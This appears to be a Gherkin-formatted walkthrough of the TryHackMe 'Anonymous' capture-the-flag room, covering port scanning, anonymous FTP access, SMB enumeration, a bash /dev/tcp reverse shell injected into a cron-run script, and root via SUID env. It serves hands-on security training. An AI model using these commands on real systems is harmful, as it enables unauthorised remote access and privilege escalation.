Feature:
  Site:
    TryHackMe
  Category:
    CTF
  User:
    FearTheKS
  Goal:
    Vulnerate system to get 2 flags.
  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali Linux      | 2020.2      |
    | nmap            | 7.80        |
    | cat             | 8.30        |
    | lftp            | 4.8.4       |
    | Linux NetKit    | 0.17        |
    | smbclient       | 4.9.5       |
    | rlwrap          | 0.43        |
    | netcat          | 1.10-41.1+b1|

  Machine Information:
    Given me connected to the TryHackMe VPN
    And the remote machine IP is 10.10.47.231

  Scenario: Success: nmap scan
    Given I wanting to hack that machine
    Then I run a nmap scan like this
    """
    $ nmap -sC -sV --open -T5 --min-rate=1000 -p- -n -oN anonymous 10.10.47.231
    """
    And the output shows me 4 open ports
    """
    ...
    21/tcp open ftp vsftpd 2.0.8 or later
    22/tcp open ssh OpenSSH 7.6p1
    139/tcp open netbios-ssn Samba smbd 3.X - 4.X
    445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu
    ...

    """
  Scenario: Success: Anonymous login over FTP
    Given me staring at port 21 open
    And I want to know what is there
    Then I try anonymous login
    """
    $ ftp 10.10.47.231
    Connected to 10.10.47.231.
    220 NamelessOne's FTP Server!
    Name (10.10.47.231:root): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    """
    Then I use ls command and see a scripts folder
    And I proceed to download all 3 files on that folder


  Scenario: Success: Reading downloaded files
    Given me wanting to unserstand what is on the FTP server
    Then I go to the files I downloaded and read them
    """
    $ cat to_do.txt
    I really need to disable the anonymous login...it's really not safe

    $ cat removed_files.log
    ...
    Running cleanup script:  nothing to delete
    Running cleanup script:  nothing to delete
    Running cleanup script:  nothing to delete

    $cat clean.sh
    (Output too long)
    """
    And I see the script clean.sh removes files from /tmp folder
    Then it writes the .log file if there's nothing to delete
    Then I try to upload a test file on the server
    """
    ftp> mput pwned.txt
    200 PORT command successful. Consider using PASV.
    150 Ok to send data.
    226 Transfer complete.
    """
    And my upload was successfull
    Then I notice that the .log files changes every minute
    And I conclude that the script is being executed every minute

  Scenario: Success: Enumerating smb service
    Given me wanting to know as much as posible of the server
    Then I try to list the shared fodlers of smb service
    """
    $ smbclient -L 10.10.47.231
    pics Disk My SMB Share Directory for Pics
    """
    And I see that curious share
    Then I try to open it
    """
    $ smbclient //10.10.47.231/pics

    ...
    corgo2.jpg   N 42663 Mon May 11 20:43:42 2020
    puppos.jpeg  N 265188 Mon May 11 20:43:42 2020
    ...

    """
    Then I open that pics
    And they are pics from little dogs.

  Scenario: Success: Modifiyng script to get reverse shell
    Given me wanting to enter that machine
    Then I proceed to add a bash reverse shell like this on the clean.sh script
    """
    bash -i >& /dev/tcp/10.8.61.94/6969 0>&1
    """
    And for doing that I edit the script with this command
    """
    $ lftp anonymous@10.10.47.231:/scripts
    >edit clean.sh
    """
    Then I setup my netcat listener
    """
    $ rlwrap nc -nlvp 6969
    """
    And after waiting for a minute I got a reverse shell
    """
    namelessone@anonymous:~$
    """
    Then I grab user flag
    """
    namelessone@anonymous:~$ cat user.txt
    """


  Scenario: Success: Privilege escalation
    Given me inside the machine with a low priv shell
    Then first I upgrade my shell
    """
    python -c 'import pty;pty.spawn("/bin/bash")'
    """
    Then I proceed to check for SUID files
    """
    namelessone@anonymous:/tmp$ find / -perm -u=s -type f 2>/dev/null
    """
    And I noticed something special in the output
    """
    ...
    /usr/bin/env
    ...

    """
    Then I proceed to execute the folowwing command
    """
    namelessone@anonymous:/tmp$ env /bin/sh -p
    """
    And now im root
    Then I grab last flag
    """
    # wc -c root.txt
    wc -c root.txt
    33 root.txt
    """
